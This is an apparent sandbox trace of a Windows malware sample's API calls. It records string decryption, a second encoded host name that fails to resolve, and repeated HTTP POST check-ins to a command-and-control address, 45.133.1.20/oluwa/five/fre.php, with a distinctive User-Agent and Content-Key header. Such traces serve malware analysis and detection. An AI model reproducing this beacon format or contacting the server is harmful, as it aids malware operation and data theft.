GetProcessHeap () returned 0x6a0000 [0267.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0267.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.534] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.545] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0267.556] GetProcessHeap () returned 0x6a0000 [0267.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0267.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.558] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0267.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.561] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.562] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.562] GetProcessHeap () returned 0x6a0000 [0267.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0267.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.564] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0267.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.565] CryptDestroyKey (hKey=0x6ad020) returned 1 [0267.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.566] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0267.566] GetProcessHeap () returned 0x6a0000 [0267.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.571] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0267.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.573] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0267.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.575] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0267.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.577] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0267.577] GetProcessHeap () returned 0x6a0000 [0267.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0267.578] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0267.578] GetProcessHeap () returned 0x6a0000 [0267.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0267.578] socket (af=2, type=1, protocol=6) returned 0x950 [0267.583] connect (s=0x950, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0267.613] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0267.613] GetProcessHeap () returned 0x6a0000 [0267.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0267.613] GetProcessHeap () returned 0x6a0000 [0267.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0267.614] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.615] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.615] GetProcessHeap () returned 0x6a0000 [0267.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9b70 [0267.615] GetProcessHeap () returned 0x6a0000 [0267.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0267.622] GetProcessHeap () returned 0x6a0000 [0267.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0267.622] GetProcessHeap () returned 0x6a0000 [0267.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0267.650] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.651] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.651] GetProcessHeap () returned 0x6a0000 [0267.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0267.651] GetProcessHeap () returned 0x6a0000 [0267.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0267.652] send (s=0x950, buf=0x6bd460*, len=242, flags=0) returned 242 [0267.652] send (s=0x950, buf=0x6bb998*, len=159, flags=0) returned 159 [0267.652] GetProcessHeap () returned 0x6a0000 [0267.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0267.653] recv (in: s=0x950, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0267.732] GetProcessHeap () returned 0x6a0000 [0267.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0267.732] GetProcessHeap () returned 0x6a0000 [0267.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0267.733] GetProcessHeap () returned 0x6a0000 [0267.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b70 | out: hHeap=0x6a0000) returned 1 [0267.733] GetProcessHeap () returned 0x6a0000 [0267.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0267.735] closesocket (s=0x950) returned 0 [0267.735] GetProcessHeap () returned 0x6a0000 [0267.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0267.736] GetProcessHeap () returned 0x6a0000 [0267.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.736] GetProcessHeap () returned 0x6a0000 [0267.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0267.736] GetProcessHeap () returned 0x6a0000 [0267.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0267.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16d0) returned 0x950 [0267.739] Sleep (dwMilliseconds=0xea60) [0267.740] GetProcessHeap () returned 0x6a0000 [0267.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0267.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.741] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0267.772] GetProcessHeap () returned 0x6a0000 [0267.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0267.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.773] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0267.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.774] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.776] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.776] GetProcessHeap () returned 0x6a0000 [0267.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0267.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.780] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0267.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.781] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0267.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.782] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0267.782] GetProcessHeap () returned 0x6a0000 [0267.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.783] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.784] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.785] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.786] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.786] GetProcessHeap () returned 0x6a0000 [0267.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0267.786] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.786] GetProcessHeap () returned 0x6a0000 [0267.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0267.786] GetProcessHeap () returned 0x6a0000 [0267.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.787] GetProcessHeap () returned 0x6a0000 [0267.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0267.787] GetProcessHeap () returned 0x6a0000 [0267.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0267.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.791] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0267.803] GetProcessHeap () returned 0x6a0000 [0267.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0267.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.804] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0267.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.805] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.806] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.806] GetProcessHeap () returned 0x6a0000 [0267.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0267.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.808] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0267.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.809] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0267.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.811] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0267.811] GetProcessHeap () returned 0x6a0000 [0267.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0267.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.815] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0267.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.816] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0267.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.817] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0267.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0267.819] GetProcessHeap () returned 0x6a0000 [0267.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0267.819] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0267.819] GetProcessHeap () returned 0x6a0000 [0267.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0267.819] socket (af=2, type=1, protocol=6) returned 0x954 [0267.819] connect (s=0x954, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0267.848] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0267.848] GetProcessHeap () returned 0x6a0000 [0267.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0267.848] GetProcessHeap () returned 0x6a0000 [0267.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0267.849] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.850] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.851] GetProcessHeap () returned 0x6a0000 [0267.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9b70 [0267.851] GetProcessHeap () returned 0x6a0000 [0267.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0267.851] GetProcessHeap () returned 0x6a0000 [0267.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0267.851] GetProcessHeap () returned 0x6a0000 [0267.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0267.853] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0267.854] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.854] GetProcessHeap () returned 0x6a0000 [0267.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0267.854] GetProcessHeap () returned 0x6a0000 [0267.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0267.859] send (s=0x954, buf=0x6bd460*, len=242, flags=0) returned 242 [0267.859] send (s=0x954, buf=0x6bb998*, len=159, flags=0) returned 159 [0267.860] GetProcessHeap () returned 0x6a0000 [0267.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0267.860] recv (in: s=0x954, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0267.932] GetProcessHeap () returned 0x6a0000 [0267.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0267.933] GetProcessHeap () returned 0x6a0000 [0267.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0267.934] GetProcessHeap () returned 0x6a0000 [0267.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b70 | out: hHeap=0x6a0000) returned 1 [0267.935] GetProcessHeap () returned 0x6a0000 [0267.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0267.936] closesocket (s=0x954) returned 0 [0267.936] GetProcessHeap () returned 0x6a0000 [0267.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0267.937] GetProcessHeap () returned 0x6a0000 [0267.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0267.937] GetProcessHeap () returned 0x6a0000 [0267.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0267.938] GetProcessHeap () returned 0x6a0000 [0267.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0267.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16d4) returned 0x954 [0267.940] Sleep (dwMilliseconds=0xea60) [0267.942] GetProcessHeap () returned 0x6a0000 [0267.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0267.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.945] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0267.994] GetProcessHeap () returned 0x6a0000 [0267.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0267.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.995] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0267.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.996] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0267.997] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.997] GetProcessHeap () returned 0x6a0000 [0267.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0268.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.013] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0268.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.013] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0268.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.014] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0268.014] GetProcessHeap () returned 0x6a0000 [0268.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0268.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.015] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.016] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.017] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.018] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.018] GetProcessHeap () returned 0x6a0000 [0268.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.018] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.018] GetProcessHeap () returned 0x6a0000 [0268.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0268.019] GetProcessHeap () returned 0x6a0000 [0268.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0268.019] GetProcessHeap () returned 0x6a0000 [0268.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0268.020] GetProcessHeap () returned 0x6a0000 [0268.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0268.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.023] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0268.053] GetProcessHeap () returned 0x6a0000 [0268.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0268.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0268.054] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, 